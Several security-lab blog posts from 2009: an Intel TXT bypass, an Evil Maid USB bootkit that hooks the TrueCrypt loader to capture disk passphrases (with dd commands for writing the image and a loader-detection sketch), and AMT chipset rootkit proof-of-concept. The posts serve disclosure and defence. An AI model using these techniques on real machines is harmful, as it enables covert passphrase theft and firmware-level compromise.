Monday, December 21, 2009

Another TXT Attack

Earlier this year our team presented an attack against Intel TXT that exploited a design problem: SMM is overprivileged on PC platforms and able to interfere with the SENTER instruction. Intel's response was two-fold: to patch the SMM implementation bugs we used for the attack (the patch covered both the NVACPI SMM attacks and the SMM caching attack), and also to start (intensify?) work on the STM specification, which, we heard, is planned to be published sometime in the near future. The STM is a thin hypervisor concept that is supposed to provide protection against (potentially) malicious SMMs.

Today we present a totally different attack that allows an attacker to trick the SENTER instruction into misconfiguring the VT-d engine, so that it doesn't protect the newly loaded hypervisor or kernel. This attack exploits an implementation flaw in a SINIT AC module. It also allows for full TXT circumvention using software only, doesn't require any SMM bugs to succeed, and is totally independent of the previous attack.

The press release is here.

The full paper is here.

The advisory published by Intel today can be found here.

Enjoy.

Friday, October 16, 2009

Evil Maid goes after TrueCrypt!

From time to time it’s good to take a break from all the ultra-low-level stuff, like e.g. chipset or TXT hacking, and do something simple, yet still important. Recently Alex Tereshkin and I got some spare time and implemented the Evil Maid Attack against TrueCrypt system disk encryption in the form of a small bootable USB stick image that allows one to perform the attack in an easy “plug-and-play” way. The whole infection process takes about 1 minute, and it’s well suited to be carried out by hotel maids.

The Attack
Let’s quickly recap the Evil Maid Attack. The scenario we consider is when somebody leaves an encrypted laptop, e.g. in a hotel room. Let’s assume the laptop uses full disk encryption, such as that provided by TrueCrypt or PGP Whole Disk Encryption.

Many people, including some well-known security experts, believe that it is advisable to fully power down your laptop when you use full disk encryption, in order to prevent FireWire/PCMCIA or ”cold boot” attacks.

So, let’s assume we have a reasonably paranoid user who uses full disk encryption on his or her laptop, and also powers it down every time it is left alone in a hotel room, or somewhere else.

Now, this is where our Evil Maid stick comes into play. All the attacker needs to do is sneak into the user’s hotel room and boot the laptop from the Evil Maid USB stick. After some 1-2 minutes, the target laptop gets infected with the Evil Maid sniffer, which will record the disk encryption passphrase the next time the user enters it. As any smart user might have guessed already, this part is ideally suited to be performed by hotel maids, or people pretending to be them.

So, after our victim gets back to the hotel room and powers up his or her laptop, the passphrase will be recorded and e.g. stored somewhere on the disk, or maybe transmitted over the network (not implemented in the current version).

Now we can safely steal/confiscate the user’s laptop, as we know how to decrypt it. End of story.

Quick Start
Download the USB image here. In order to “burn” the Evil Maid image onto a stick, use the following command on Linux (you need to be root to do dd):

dd if=evilmaidusb.img of=/dev/sdX

where /dev/sdX should be replaced with the device representing your USB stick, e.g. /dev/sdb. Please be careful, as choosing the wrong device might result in damaging your hard disk or other media! Also, make sure to use the device representing the whole disk (e.g. /dev/sdb), rather than a disk partition (e.g. /dev/sdb1).
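If you want to double-check that the image was written correctly, you can compare a hash of the image file with a hash of the same number of bytes read back from the stick. Here is a minimal sketch in Python (run as root; the file and device names are just examples):

import hashlib, os, sys

# Usage: python verify_usb.py evilmaidusb.img /dev/sdX
image_path, device_path = sys.argv[1], sys.argv[2]
image_size = os.path.getsize(image_path)

def sha1_of(path, length):
    # Hash the first 'length' bytes of a file or block device.
    h = hashlib.sha1()
    with open(path, "rb") as f:
        remaining = length
        while remaining > 0:
            chunk = f.read(min(1024 * 1024, remaining))
            if not chunk:
                break
            h.update(chunk)
            remaining -= len(chunk)
    return h.hexdigest()

if sha1_of(image_path, image_size) == sha1_of(device_path, image_size):
    print("OK: the stick matches the image")
else:
    print("MISMATCH: the write failed or you used the wrong device")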

On Windows you would need to get a dd-like program, e.g. this one, and the command would look more or less like the following (depending on the actual dd implementation you use):

dd if=evilmaidusb.img of=\\?\Device\HarddiskX\Partition0 bs=1M

where HarddiskX should be replaced with the actual device that represents your stick.

After preparing the Evil Maid USB stick, you’re ready to test it against some TrueCrypt-encrypted laptop (more technically: a laptop that uses TrueCrypt system disk encryption). Just boot the laptop from the stick, confirm you want to run the tool (press ‘E’), and the TrueCrypt loader on the laptop should get infected.

Now, Evil Maid will be logging the passphrases provided at boot time. To retrieve the recorded passphrase, just boot again from the Evil Maid USB -- it should detect that the target is already infected and display the sniffed password.

The current implementation of Evil Maid always stores the last passphrase entered, on the assumption that this is the correct one (the user might have mistyped the passphrase at earlier attempts).

NOTE: It’s probably illegal to use Evil Maid to obtain passwords from other people without their consent. You should always obtain permission from other people before testing Evil Maid against their laptops!

CAUTION: The provided USB image and source code should be considered proof-of-concept only. Use this code at your own risk, and never run it against a production system. Invisible Things Lab cannot be held responsible for any potential damages this code or its derivatives might cause.

How the Evil Maid USB works
The provided implementation is extremely simple. It first reads the first 63 sectors of the primary disk (/dev/sda) and checks (looking at the first sector) whether the code there looks like a valid TrueCrypt loader. If it does, the rest of the code is unpacked (using gzip) and hooked. Evil Maid hooks the TC function that asks the user for the passphrase, so that the hook records whatever passphrase is provided to this function. We also take care to adjust some fields in the MBR, like the boot loader size and its checksum. After the hooking is done, the loader is packed again and written back to the disk.
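To illustrate just the detection step described above, here is a rough Python sketch (the "TrueCrypt" string check and the device path are simplifying assumptions for illustration; the real infector of course also unpacks, hooks and re-packs the loader):

import sys

SECTOR_SIZE = 512
LOADER_SECTORS = 63   # the unencrypted track before the first partition

def read_loader(device):
    # Read the MBR plus the rest of the first track, where the TC loader lives.
    with open(device, "rb") as disk:
        return disk.read(LOADER_SECTORS * SECTOR_SIZE)

def looks_like_truecrypt(loader):
    # Heuristic only: a valid MBR ends with 0x55AA, and we assume the first
    # sector carries a recognizable "TrueCrypt" marker.
    mbr = loader[:SECTOR_SIZE]
    return mbr[510:512] == b"\x55\xaa" and b"TrueCrypt" in mbr

device = sys.argv[1] if len(sys.argv) > 1 else "/dev/sda"
if looks_like_truecrypt(read_loader(device)):
    print("TrueCrypt loader found - this is where the real tool would gunzip")
    print("the loader, hook the passphrase prompt, fix the MBR size/checksum")
    print("fields, re-pack the code and write it back to disk")
else:
    print("No TrueCrypt loader found")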

You can get the source code for the Evil Maid infector here.

Possible Workarounds
So, how should we protect against such Evil Maid attacks? There are a few approaches...

1. Protect your laptop when you leave it alone
Several months ago I had a discussion with one of the TrueCrypt developers about possible means of preventing the Evil Maid Attack, perhaps using a TPM (see below). Our dialog went like this (reproduced here with permission from the TrueCrypt developer):

TrueCrypt Developer: We generally disregard "janitor" attacks since they inherently make the machine untrusted. We never consider the feasibility of hardware attacks; we simply have to assume the worst. After an attacker has "worked" with your hardware, you have to stop using it for sensitive data. It is impossible for TPM to prevent hardware attacks (for example, using hardware key loggers, which are readily available to average Joe users in computer shops, etc.)

Joanna Rutkowska: And how can you determine that the attacker has or has not "worked" with your hardware? Do you carry your laptop with you all the time?

TrueCrypt Developer: Given the scope of our product, how the user ensures physical security is not our problem. Anyway, to answer your question (as a side note), you could use e.g. a proper safety case with a proper lock (or, when you cannot have it with you, store it in a good strongbox).

Joanna Rutkowska: If I could arrange for a proper lock or an impenetrable strongbox, then why in the world should I need encryption?

TrueCrypt Developer: Your question was: "And how can you determine that the attacker has or has not worked with your hardware?" My answer was a good safety case or strongbox with a good lock. If you use it, then you will notice that the attacker has accessed your notebook inside (as the case or strongbox will be damaged and it cannot be replaced because you had the correct key with you). If the safety case or strongbox can be opened without getting damaged & unusable, then it's not a good safety case or strongbox. ;-)

That's a fair point, but it means that for the security of our data we must rely on the infeasibility of opening our strongbox lock in a "clean" way, i.e. without visibly damaging it. Plus, it means we need to carry a good strongbox with us on every trip we take. I think we need a better solution...

Note that TrueCrypt authors do mention the possibility of physical attacks in the documentation:
If an attacker can physically access the computer hardware and you use it after the attacker has physically accessed it, then TrueCrypt may become unable to secure data on the computer. This is because the attacker may modify the hardware or attach a malicious hardware component to it (such as a hardware keystroke logger) that will capture the password or encryption key (e.g. when you mount a TrueCrypt volume) or otherwise compromise the security of the computer.
However, they do not explicitly warn users about the possibility of something as simple and cheap as the Evil Maid Attack. Sure, they write "or otherwise compromise the security of the computer", which does indeed cover e.g. the Evil Maid Attack, but my bet is that very few users realize what it really means. The examples of physical attacks given in the documentation, e.g. modifying the hardware or attaching a malicious hardware component, are something most users would disregard as too expensive an attack to be afraid of. But note that our Evil Maid attack is an example of a “physical” attack that doesn’t require any hardware modification and is extremely cheap.

Of course it is a valid point that if we allow for the possibility of a physical attack, then the attacker can e.g. install a hardware keylogger. But doing that is really not that easy, as we discuss below. On the other hand, spending two minutes to boot the machine from an Evil Maid USB stick is trivial and very cheap (the price of the USB stick, plus the tip for the maid).

2. The Trusted Computing Approach
As explained a few months ago on this blog, a reasonably good solution against the Evil Maid attack seems to be to take advantage of either the static or the dynamic root of trust offered by a TPM. The first approach (SRTM) is what has been implemented in Vista Bitlocker. However, Bitlocker doesn’t try to authenticate itself to the user (e.g. by displaying a custom picture taken by the user, decrypted using a key unsealed from the TPM), so it’s still possible to create a similar attack against Bitlocker, only with a somewhat different user experience. Namely, the Evil Maid for Bitlocker would have to display a fake Bitlocker prompt (which could be identical to the real Bitlocker prompt), but after obtaining the correct password from the user, Evil Maid would not be able to pass execution to the real Bitlocker code, as the SRTM chain would be broken. Instead, Evil Maid would have to pretend that the password was wrong, uninstall itself, and then reboot the platform. Thus, a Bitlocker user who is confident that he or she entered the correct password, yet the OS didn’t boot correctly, should destroy the laptop.

The dynamic root of trust approach (DRTM) is possible thanks to Intel TXT technology, but currently there is no full disk encryption software that makes use of it. One could try to implement it using Intel’s tboot and some Linux disk encryption, e.g. LUKS.

Please also note that even if somebody “cracked” the TPM chip (e.g. using an electron microscope, or an NSA backdoor), that doesn’t mean this person automatically gets access to the encrypted disk contents. The TPM is used only for ensuring trusted boot; after cracking it, the attacker would still have to mount an Evil Maid attack in order to obtain the passphrase or key. Without a TPM, this attack is always possible.

Are those trusted-computing-based approaches 100% foolproof? Of course not. As signaled in the previous paragraph, if an attacker was able to install a hardware keylogger in your laptop (which is non-trivial, but possible), then the attacker would be able to capture your passphrase regardless of the trusted boot. A user can prevent such an attack by using two-factor authentication (e.g. an RSA challenge-response implemented in a USB token) or one-time passwords, so that there is no benefit for the attacker in capturing the keystrokes. But the attacker might go to the extreme and e.g. replace the DRAM, or even the CPU, with malicious DRAM or a malicious CPU that would sniff and store the decryption key for later access. We’re talking here about attacks that very few entities can probably afford (think NSA), but they are nevertheless theoretically possible. (Note that an attack based on inserting a malicious PCI device that tries to sniff the key using DMA can be prevented using TXT+VT-d technology.)

However, just because the NSA could theoretically replace your CPU with a malicious one doesn’t mean TPM-based solutions are useless. For the great majority of people who do not happen to be on the Terrorist Top 10, they represent a reasonable solution that could prevent Evil Maid attacks and, when combined with proper two-factor authentication, also simple hardware-based attacks, e.g. keyloggers, cameras, or remote keystroke sniffing using lasers. I really cannot think of a more reasonable solution here.

3. The Poor Man’s Solution
Personally I would love to see TrueCrypt implement TPM-based trusted boot for its loader, but, well, what can I do? Keep bothering the TrueCrypt developers with Evil Maid attacks and hope they will eventually consider implementing TPM support...

So, in the meantime we have come up with a temporary poor man’s solution that we use at our lab. We call it Disk Hasher. It’s a bootable Linux-based USB stick that can be configured in quite a flexible way to calculate hashes of selected disk sectors and partitions. The correct hashes are also stored on the stick (of course everything is encrypted with a custom laptop-specific passphrase). We use this stick to verify the unencrypted portions of our laptops (typically the first 63 sectors of sda, and also the whole /boot partition in the case of Linux-based laptops where we use LUKS/dm-crypt).
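The core idea is trivial. A minimal sketch in Python (the device names, sector counts and reference hashes are illustrative, and the real Disk Hasher additionally keeps its reference hashes encrypted):

import hashlib

SECTOR_SIZE = 512

def hash_region(device, num_sectors=None):
    # Hash the first num_sectors of a device, or the whole device if None.
    h = hashlib.sha256()
    remaining = num_sectors * SECTOR_SIZE if num_sectors else None
    with open(device, "rb") as f:
        while True:
            to_read = 1024 * 1024 if remaining is None else min(1024 * 1024, remaining)
            if to_read == 0:
                break
            chunk = f.read(to_read)
            if not chunk:
                break
            h.update(chunk)
            if remaining is not None:
                remaining -= len(chunk)
    return h.hexdigest()

# Reference hashes recorded when the laptop was known to be clean
# (stored encrypted on the real stick).
known_good = {
    "loader (first 63 sectors of sda)": ("/dev/sda", 63, "put-known-hash-here"),
    "/boot partition":                  ("/dev/sda1", None, "put-known-hash-here"),
}

for name, (device, sectors, good_hash) in known_good.items():
    status = "OK" if hash_region(device, sectors) == good_hash else "MODIFIED!"
    print(name, "->", status)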

Of course there are many problems with such a solution. E.g. somebody who gets access to my Disk Hasher USB (e.g. when I’m in a swimming pool) can infect it in such a way that it reports correct hashes, even though the disk of my laptop has been “evilmaided”...

Another problem with the Disk Hasher solution is that it only looks at the disk, but cannot validate e.g. the BIOS. So if the attacker found a way to bypass the BIOS reflashing protection on my laptop, then he or she could install a rootkit there that would sniff my passphrase, or the decryption key (in case I used one-time passwords).

Nevertheless, our Disk Hasher stick seems like a reasonable solution, and we often use it internally at ITL to validate our laptops. In fact, this is the most we can do if we want to use TrueCrypt, PGP WDE, or LUKS/dm-crypt.

FAQ

Q: Is this Evil Maid Attack some l33t new h4ck?
Nope, the concept behind the Evil Maid Attack is neither new, nor l33t in any way.

Q: So, why did you write it?
Because we believe it demonstrates an important problem, and we would like more attention to be paid in the industry to solving it.

Q: I’m using two-factor authentication, am I protected against EM?
While two-factor authentication or one-time passwords are generally a good idea (e.g. they can prevent various keylogger attacks), they alone do not provide protection from Evil Maid-like attacks, because the attacker might modify his or her sniffer to look for the final decryption key (which is calculated after the two-factor authentication completes).

Q: How is Evil Maid different from Stoned-Bootkit?
The Stoned Bootkit, released a few months ago by an individual describing himself as a “Software Dev. Guru in Vienna”, is also claimed to be capable of "bypassing TrueCrypt", which we take to mean the capability to sniff TC's passphrases or keys. Still, the biggest difference between the Stoned Bootkit and Evil Maid USB is that in the case of our attack you don’t need to start the victim's OS in order to install Evil Maid; all you need to do is boot from a USB stick, wait about 1 minute for the minimal Linux to start, press ‘E’, wait some 2 more seconds, and you’re done. With the Stoned Bootkit, according to the author’s description, you need to get admin access to the target OS in order to install it, so you either need to know the Windows admin password first, or use some exploit to get the installer executing on the target OS. Alternatively, you can install it from a bootable Windows CD, but this, according to the author, works only against unencrypted volumes, so it is of no use for a TrueCrypt compromise.

Q: I've disabled boot from USB in BIOS and my BIOS is password protected, am I protected against EM?
No. Taking out your HDD, hooking it up to a USB enclosure, and later installing it back in your laptop increases the attack time by some 5-15 minutes at most. The maid has to carry her own laptop to do this, though.

Q: What about using a HDD with built-in hardware-based encryption?
We haven’t tested such encryption systems, so we don’t know. There are many open questions here: how is the passphrase obtained from the user? Using software stored on the disk or in the BIOS? If on the disk, is this portion of the disk made read-only? If so, does that mean it is non-updatable? Even if it is truly read-only, if the attacker can reflash the BIOS, then he or she can install a passphrase sniffer in the BIOS. Of course that would make the attack non-trivial and much more expensive than the original Evil Maid USB we presented here.

Q: Which TrueCrypt versions are supported by the current Evil Maid USB?
We have tested our Evil Maid USB against TrueCrypt versions 6.0a - 6.2a (the latest version currently available). Of course, if the “shape” of the TrueCrypt loader changed dramatically in the future, then Evil Maid USB would require updating.

Q: Why did you choose TrueCrypt and not some other product?
Because we believe TrueCrypt is a great product, we use it often in our lab, and we would love to see it getting some better protection against such attacks.

Q: Why is there no TPM support in TrueCrypt?
The TrueCrypt Foundation has published an official, generalized response to TPM-related feature requests here.

Acknowledgments
Thanks to ennead@truecrypt.org for all the polemics we had, which allowed me to better organize my thoughts on the topic. The same thanks go to Alex and Rafal, for all the polemics I have had with them (it's customary at ITL to spend a lot of time finding bugs in each other's reasoning).

Tuesday, September 22, 2009

Intel Security Summit: the slides

Last week I was invited to Hillsboro to speak at Intel's internal conference on security. My presentation was titled "A Quest To The Core: Thoughts on present and future attacks on system core technologies", and my goal was to give a quick summary of the research our team has done over the last 12 months or so, and to explain why we're so keen on hacking the low-level system components, while all the rest of the world is excited about browser and flash player bugs.

The slides (converted to PDF) can be found here. As you will see, I decided to remove most of the slides from the "Future" chapter. One reason was that we didn't want to give Loic, our competition, any hints about some of the new toys we're working on ;) The other reason is that, I think, presenting only thoughts about attacks, i.e. unproven thoughts, or, should I even say, feelings about future attacks, has little research value, and while I can understand such information being important to Intel, I don't see how others could benefit from it.

I must say it was nice and interesting to meet in person with various Intel architects, i.e. the people who actually design and create the basic "universe" we all operate in. You can always change the OS (or even write your own!), but you must still stick to the rules, or "laws", of the platform (unless you can break them ;)

Wednesday, September 02, 2009

About Apple’s Security Foundations, Or Lack Thereof...

Every once in a while it’s healthy to reinstall your system... I know, I know, it’s almost heresy to say that, but that’s reality in a world where our systems are totally unverifiable. In fact I don’t even attempt to verify whether my Mac laptop has been compromised in any way (most system files are not signed anyway). But sometimes you get this feeling that something might be wrong and you decide to reinstall, to start your (digital) life all over again :)

So, every time I (re)install a Mac-based system, I end up cursing horribly at Apple’s architects. Why? Because in the Apple world they seem to totally ignore the concept of file integrity, to such an extent that it’s virtually impossible to get any assurance that the programs I install are in any way authentic (i.e. not tampered with by some 3rd party, e.g. by somebody controlling my Internet connection).

Take any Apple installer package, e.g. Thunderbird. In most cases an installer package on the Mac is a .dmg file that represents an installation disk image. Now, when you open such a file under Mac OS, the OS will never display any information about whether this file is signed (and by whom) or not. In fact, I’m pretty sure it’s never signed. What you end up with is a .dmg file that you just downloaded over plaintext HTTP, and you have absolutely no way of verifying whether it is the original file the vendor really published. And you’re just about to grant admin privileges to the installer program that is inside this file -- after all it’s an installer, so it must get root privileges, right (well, maybe not quite)? Beautiful...

Interestingly, this very same Thunderbird installer, but for Windows, is correctly signed, and Windows correctly displays that information (together with the ability to examine the certificate) and allows the user to choose whether to allow it to run or not.



Sure, the certificate doesn’t guarantee that Mozilla didn’t put a nasty backdoor in there, nor that the file was not compromised due to Mozilla’s internal server compromise. Or that the certificate (the private key) wasn’t somehow stolen from Mozilla, or that the issuing authority didn’t make a mistake and maybe issued this certificate to some random guy, who just happened to be named Mozilla.

But the certificate provides liability. If it indeed turned out that this very Thunderbird installer was somehow malicious, I could take this signed file to court and sue either Mozilla or the certification authority for all the damage it might have done to me. Without the certificate I cannot do that, because nobody can know whether the file was tampered with while being downloaded (e.g. by a malicious ISP) or because my system was already compromised.

But in the case of Apple, we have no such choice -- we need to take the risk every time we download a program from the Internet. We must bet the security of our whole system on the hope that at this very moment nobody is tampering with our (unsecured) HTTP connection, that nobody has compromised the vendor’s web server, and, of course, that the vendor didn’t put any malicious code into its product (as we could not sue them for it).

So that sucks. That sucks terribly! Without the ability to check the integrity of the programs we want to install, we cannot build any solid foundations. It’s funny how people debate whether Apple implemented ASLR correctly in Snow Leopard or not, or whether NX is bypassable. It’s meaningless to dive into such advanced topics if we cannot even assure that at day 0 our system is clean. We need to start building our systems from the ground up, not starting from the roof! The ability to assure that the software we install has not been tampered with seems like a reasonable very first step. (Sure, it could be compromised 5 minutes later, and to protect against that we should have other mechanisms, like the ASLR and NX mentioned above.)

And Apple should not blame the vendors for this situation (“Vendors would never pay $300 for a certificate”, blah, blah): it is enough to look at the Windows versions of the same products and notice that most of them do have signed installers (gee, even the open-source TrueCrypt has a signed installer for Windows!).

It should be said that a few vendors, seeing this problem on the Mac, do publish PGP signatures for their installation files. This includes e.g. PGP Desktop for Mac, KeePassX, TrueCrypt for Mac, and a few others. But these are just exceptions, and I wonder how many users will be disciplined (and savvy) enough to correctly verify those PGP signatures (in general it requires you to download the vendor’s key many months in advance and keep it in your keyring, to minimize the possibility that somebody alters both the installer files and the key you download). Some other vendors offer pseudo-integrity by displaying MD5/SHA1 sums on their websites. That would make some sense only if the website on which the hashes are displayed was itself SSL-protected (a file signature is still a better option), as otherwise we can be sure that an attacker who is tampering with the installer file will also take care to adjust the hash on the website... But of course this is never the case -- have a look e.g. at the VMWare download page for Mac Fusion (one needs to register first). Very smart, VMWare! (Needless to say, the VMWare Workstation installer for Windows is properly signed.)

BTW, has anybody checked whether Apple updates are digitally signed somehow?

Everything I wrote in this post is trivial. It should be obvious to every decently educated software engineer. Believe me, it really is much more fun for me to write about things like new attacks on chipsets or virtualization. But I have this little hope that maybe somebody at Apple will read this post and fix their OS. Because I really like Apple products for their aesthetics...

Wednesday, August 26, 2009

PDF signing and beyond

Today I got an advertising email from GlobalSign (where I previously bought a code signing certificate for Vista kernel drivers some years ago) highlighting their new (?) type of certificates for signing Adobe PDF files. It made me curious because, frankly, I've recently been missing this feature more and more. After a quick online search it turned out that this whole Adobe Certified Document Services (CDS) thing is nothing new, as apparently even Adobe Reader 6.0 had support for verifying those CDS certificates. The certificates are also available from other popular certification authorities, e.g. Entrust and Verisign, and a couple of others.

So, I immediately felt stupid that I hadn't been aware of such a great feature, which apparently has been out there for a few years now. Why did I think it was so great a feature? Consider the following scenario…

At our Invisible Things Lab resources page we offer a handful of files to download — slides and some proof-of-concept code. The website is served over plaintext HTTP. This means that if you're downloading anything over a public WiFi (hotel, airport lounge, etc.) you never know whether the PDF you actually get has been infected somewhere in the middle, e.g. by a guy in the lobby who is messing with the hotel WiFi.

So, one might argue that I should have paid a few hundred bucks, gotten an SSL certificate for my website, and started serving it over HTTPS. But here's the problem — I, like zillions of other small businesses and individuals, host my website with some 5-dollar-a-month, one-of-thousands hosting provider. I have zero knowledge about the people who work there and whether they can be trusted, and I also know nothing about (and have zero impact on) how secure (or not, for that matter) the server is. (The same applies to my cell phone carrier, ISP, etc., BTW.)

Now, an SSL certificate for the website "knows" nothing about what the files on my website should look like, and in particular whether they are compromised or not. All the SSL certificate does is give assurance to the remote client that he or she downloaded the actual files that were on the server at the moment of downloading — whether they were the original ones authored by me, or perhaps maliciously modified by somebody who got access to the server.

So, the solution with an SSL certificate would work only if I trusted my web server, which could be assumed only if I ran my own dedicated server. That, however, would be overkill for a small company like ITL, especially since our business is not based on our web presence — in fact the website is maintained mainly for other researchers and students, who can easily download our papers and code from there, and also for reporters, so they can e.g. download a press release.

Surprisingly, the website has never been compromised, probably because it doesn't present an interesting target for any skilled person (or maybe exceptionally skilled people work at the hosting provider?). But I cannot know for sure, as I don't constantly monitor the hashes of all the files, as this would require… well, a dedicated server running an SHA1-calculating script in a loop 24/7 :)

Of course, zillions of other websites work this very same way and present the very same problems.

Now, the ability to sign PDFs would be a great solution here, because I could sign all those files with my certificate, and then all the people downloading stuff from ITL would know they are getting the original PDFs that were created on one of the ITL members' desktop computers, no matter how compromised the web server or the network connection is.

For the same reasons, I would welcome it if others started doing the same, as currently I simply must assume every PDF I download from the net (and PDFs account for the majority of the file downloads I do) to be potentially malicious. So, I always open them in my Red or Yellow VM (depending on the source of the download), and only if it "looks good" (very fuzzy term, I know) might I decide to move it to my host desktop (it's easier to work with PDFs on your host, and actually you should use your host desktop for something).

(Yes, I know, Kostya Kortchinsky, or Rafal, can sometimes escape from VMWare, but I still believe that today the best isolation I can get on a desktop, without sacrificing much convenience, is via a type II hypervisor. It's horribly inelegant, but well, that's life.)

So, I read some more about this Adobe CDS, being all excited about it, and ready to spend a few hundred euros on a certificate, only to realize that it doesn't look as good as I thought.

The first disappointment comes from the fact that you must create the PDF using Adobe Acrobat software (not the Reader, but the commercial one). I've created all my PDFs using either Office (in the past) or iWork (today), and neither of them seems to offer a way to digitally sign a PDF. I would like to have a simple tool, say pdfsign.exe, that I could use to sign any PDF I have, no matter how I generated it. Also, not surprisingly, the Mac native PDF viewer (Preview) doesn't seem to recognize the digital signature, and I bet some Linux PDF viewers don't either.

Worst of all, even Acrobat Reader 9, which I tested under Windows and which correctly displayed all the CDS information, does one unbelievably stupid thing — it parses and renders the whole PDF before displaying the signature info. So, if you downloaded a malicious PDF, Acrobat Reader will happily open and parse it, without asking whether you would like to open it at all (given that it is, say, unsigned). At least I was unable to find an option that would force it to do that. So, if the PDF contained an exploit for the reader, it would surely get executed. Compare this with the (correct) behavior of Vista UAC, which presents the executable's signature details before executing it.

You can see how your software handles Adobe PDF signatures, e.g. by looking at this example file signed by GlobalSign.

So, Adobe CDS certificates, in the form they exist today, seem to be pretty useless as far as protection from potentially malicious PDFs is concerned (they surely have other positive applications, e.g. certifying the authenticity of a diploma).

But wouldn't it be great to have such a file signing mechanism globally adopted, and not only for PDFs, but for any sort of file, including ZIPs, tgz's, heck, even plain text files? And have our main OSes generically recognize those signatures and display unified prompts asking whether we want to allow an application to open the file or not? Perhaps, in some situations, we could even define policies for specific applications. This seems easy to do from the technical point of view — we just need to "hook" (oh, God, did I say "hook"?) high-level OS APIs like e.g. open() or CreateFile().
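Just to make the idea more tangible, here is a tiny user-level sketch of such a verify-before-open wrapper in Python (it assumes the 'cryptography' package, a detached RSA signature stored next to the downloaded file, and a locally trusted public key; a real implementation would of course live inside the OS, hook open()/CreateFile(), and use proper PKI):

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.serialization import load_pem_public_key

def open_verified(path, pubkey_path):
    # Refuse to hand out the file contents unless the detached signature
    # (path + ".sig") verifies against the trusted public key.
    with open(pubkey_path, "rb") as f:
        pubkey = load_pem_public_key(f.read())
    with open(path, "rb") as f:
        data = f.read()
    with open(path + ".sig", "rb") as f:
        signature = f.read()
    try:
        pubkey.verify(signature, data, padding.PKCS1v15(), hashes.SHA256())
    except InvalidSignature:
        raise IOError(path + ": signature check failed, refusing to open")
    return data

# e.g.: content = open_verified("some_paper.pdf", "vendor_pubkey.pem")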

What about PGP and the possibility of using it for signing any sort of file? Well, we use PGP a lot at ITL, but mainly for securing peer-to-peer communication (e.g. between us and our clients). There really is no good way to publish one's PGP key — the concept of the Web of Trust might be good for some closed groups of people, but not for publishing files "to the world". And, of course, the first thing an attacker who subverted the PDFs on our website would do is also subvert the PGP key displayed on the website. I also once tried to publish a PGP key to a key server, but got discouraged immediately after I noticed it didn't use SSL for submission. BTW, does anybody know whether key servers today use SSL? If not, how is the trust established? Maybe email clients, e.g. Thunderbird, come with built-in PGP keys for select key servers?

So, I guess that was the main point of writing this post — to express how madly I would welcome a generic, OS-based, non-obligatory signature verification for files, based on PKI :)

Ah, before a dozen people jump to the comment box to tell me that digital signatures do not assure the non-maliciousness of anything — please don't do that, because I actually know that. In fact, it is not possible to assure the non-maliciousness of pretty much anything, especially without first strictly defining the ethical system we would like to use. What the signatures provide is liability, so that I know whom to sue in case my naked holiday pictures get leaked to the public because of some malicious PDF exploiting my system. In that case I can sue either the actual person who signed the PDF (if this person is identifiable) or the certification authority that issued the certificate to the wrong (unidentifiable) person.

Tuesday, August 25, 2009

Vegas Toys (Part I): The Ring -3 Tools

We've just published the proof-of-concept code for Alex's and Rafal's "Ring -3 Rootkits" talk, presented last month at the Black Hat conference in Vegas. You can download the code from our website here. It's highly recommended that one (re)reads the slides before playing with the code.

In short, the code demonstrates injection of arbitrary ARC4 code into a vPro-compatible chipset's AMT/ME memory using the chipset memory reclaiming attack. Check the README and the slides for more information.


The actual ARC4 code we distribute here is very simple: it sets up a DMA write transaction to host memory every ca. 15 seconds in order to write the "ITL" string at predefined physical addresses (increased by 4 with every iteration). Of course one can do DMA reads as well.


The ability of the ARC4 code to do DMA to/from host memory is, in fact, all that is necessary to write a sophisticated rootkit or any sort of malware, from funny jokers to sophisticated secret sniffers. Your imagination (and good pattern searching) is the only limit here.

Neither the OS, nor any software running on the host, can access our rootkit code, unless, of course, it used the same remapping attack we used to insert our code there :) But the rootkit might even cut off this avenue by locking down the remapping registers, thus fixing the vulnerability on the fly after exploiting it (of course it would be insane for any AV to use our remapping attack in order to scan the ME space, but just for completeness ;)

An OS might attempt to protect itself from DMA accesses by the rootkit in the chipset by carefully setting VT-d protections. Xen 3.3/3.4, for example, sets VT-d protections in such a way that our rootkit cannot access the Xen hypervisor memory. We can, however, access all the other parts of the system, which includes all the domains' memory (i.e. where all the interesting data are located). Still, it should be possible to modify Xen so that it sets VT-d mappings so strictly that the AMT code (and the AMT rootkit) could not access any useful information in any of the domains. This, in fact, would be a good idea anyway, as it would also prevent any sort of hardware-based backdoors (except for backdoors in the CPU).

An AMT rootkit can, however, get around such a savvy OS, because it can modify the OS's VT-d initialization code before it sets the VT-d protections. Alternatively, if the protections were set before the rootkit was activated, the rootkit can force the system to reboot and boot it from the AMT virtual CD-ROM (in fact, AMT has been designed to be able to do exactly that), which would contain rootkit agent code that modifies the to-be-loaded OS/VMM image so that it doesn't set up VT-d properly.

Of course, the proper solution against such an attack would be to use e.g. Intel TXT to assure a trusted boot of the system. In theory this should work. In practice, as you might recall, we have already shown how to bypass Intel TXT. This TXT bypass attack still works on most (all?) hardware, as there is still no STM available in the wild (all that is needed for the attack is a working SMM attack, and last month we showed two such attacks — see the slides for the BIOS talk).

Intel released a patch a day before our presentation at Black Hat. This is a cumulative patch that also targets a few other, unrelated problems, like e.g. the SMM caching attack (also reported by Loic), the SMM nvacpi attack, and the Q45 BIOS reflashing attack (for which the code will also be published shortly).

Some of you might remember that Intel patched this very remapping bug last year, after our Xen 0wning Trilogy presentations, where we used the very same bug to get around the Xen hypervisor protections. However, Intel forgot about one small detail — namely, it was perfectly possible for malware to downgrade the BIOS to the previous, pre-Black-Hat-2008 version, without any user consent (after all, this old BIOS file was also digitally signed by Intel). So, with just one additional reboot (but without any user intervention needed), malware could still use the old remapping bug, this time to get access to the AMT memory. The recent patch mentioned above solves this problem by displaying a prompt during the reflash boot if reflashing to an older BIOS version. So now it requires user intervention (physical presence). This "downgrade protection" works, however, only if an administrator password is enabled in the BIOS.

We could get into the AMT memory on Q35, however, even if the downgrade attack were not possible. In that case we could use our BIOS reflashing exploit (the other Black Hat presentation).

However, the situation looks different on Intel's latest Q45 chipsets (which also have AMT). As explained in the presentation, we were unable to get access to the AMT memory on those chipsets, even though we can reflash the BIOS there and, consequently, get rid of all the chipset locks (e.g. the remapping locks). Still, the remapping doesn't seem to work for this one memory range where the AMT code resides.

This suggests Intel added some additional hardware to the Q45 chipset (and other Series 4 chipsets) to prevent this very type of attack. But we're not giving up on Q45 yet, and we will be trying other attacks as soon as we recover from the holiday laziness ;)

